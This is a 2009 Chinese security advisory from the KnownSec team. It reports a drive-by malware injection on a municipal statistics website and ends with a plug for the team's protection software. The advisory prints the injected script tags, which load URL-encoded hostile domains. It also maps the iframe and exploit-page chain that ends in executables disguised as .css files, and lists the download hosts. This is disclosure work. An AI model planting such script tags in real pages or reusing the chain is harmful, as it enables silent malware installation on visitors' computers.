发布时间:Sun Feb 22 2009 20:13:52 UTC+0800
最后更新时间:Sun Feb 22 2009 20:13:52 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获 安康市统计信息网(http://www.akstats.gov.cn/)被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.akstats.gov.cn/

网页被嵌入恶意链接代码:

snap1.jpg

<script src=http://%76%76%6B%39%2E%63%6E></script><script src=http://%76%76%6B%39%2E%63%6E></script><script src=http://%76%76%6B%39%2E%63%6E></script><script src=http://%76%76%6B%39%2E%63%6E></script><script src=http://%62%62%67%31%2E%63%6E></script><script src=http://%63%63%6B%31%2E%63%6E></script><script src=http://%63%63%6B%33%2E%63%6E></script>

挂马分析:
[wide]http://www.akstats.gov.cn/
 [script]http://www.akstats.gov.cn//article/js/article_wjtz.js
 [script]http://www.akstats.gov.cn//article/js/article_tjfx.js
 [script]http://www.akstats.gov.cn//article/js/article_gzdt.js
 [script]http://www.akstats.gov.cn//article/js/article_dcbg.js
 [script]http://www.akstats.gov.cn//article/js/article_zfcs.js
 [script]http://www.akstats.gov.cn//article/js/article_zfal.js
 [script]http://%76%76%6b%39%2e%63%6e
  [frame]http://www.sll4362.cn/a1/ilink.html
  [frame]http://www.sll4362.cn/a1/flink.html
  [frame]http://www.good7389.cn/b2.htm
   [frame]http://www.sll4362.cn/a2/fxx.htm
    [frame]http://www.sll4362.cn/a2/fx.htm
    [frame]http://www.sll4362.cn/a2/../a1/ss.htm
     [script]http://www.sll4362.cn/a2/../a1/xmybrx.js
      [exe]http://d.bnksw.com/new/a1.css
    [frame]http://www.sll4362.cn/a2/../a1/ms06014.htm
    [frame]http://www.sll4362.cn/a2/../a1/sina.htm
     [exe]http://d.opqxn.com/new/a2.css
    [frame]http://www.sll4362.cn/a2/../a1/no.htm
     [script]http://www.sll4362.cn/a2/../a1/wokaono.js
      [exe]http://d.opqxn.com/new/a2.css
    [frame]http://www.sll4362.cn/a2/../a1/bfyy.htm
    [frame]http://www.sll4362.cn/a2/../a1/glworld.html
     [script]http://www.sll4362.cn/a2/../a1/hohogl.js
      [exe]http://d.opqxn.com/new/a2.css
    [frame]http://www.sll4362.cn/a2/../a1/real.htm
     [script]http://www.sll4362.cn/a2/../a1/mybrreal.js
      [exe]http://d.opqxn.com/new/a2.css
    [frame]http://www.sll4362.cn/a2/../a1/real.html
     [script]http://www.sll4362.cn/a2/../a1/realdadong.js
      [exe]http://d.opqxn.com/new/a2.css
   [script]http://js.tongji.cn.yahoo.com/857114/ystet.js
 [script]http://%76%76%6b%39%2e%63%6e
 [script]http://%76%76%6b%39%2e%63%6e
 [script]http://%76%76%6b%39%2e%63%6e
 [script]http://%62%62%67%31%2e%63%6e
  [frame]http://www.sll4362.cn/a1/ilink.html
  [frame]http://www.sll4362.cn/a1/flink.html
  [frame]http://www.good7389.cn/b2.htm
 [script]http://%63%63%6b%31%2e%63%6e
  [frame]http://www.sll4362.cn/a1/ilink.html
  [frame]http://www.sll4362.cn/a1/flink.html
  [frame]http://www.good7389.cn/b2.htm
 [script]http://%63%63%6b%33%2e%63%6e
 
最终下载病毒文件:
http://d.bnksw.com/new/a1.css
http://d.opqxn.com/new/a2.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇安全团队(KnownSec team)建议用户及时安装系统安全更新补丁,使用杀毒软件开启监控保护系统免受病毒侵入。

欢迎使用针对此类挂马攻击的防护程序-365门神,

可到www.365menshen.com下载并试用。

Popularity: 10% [?]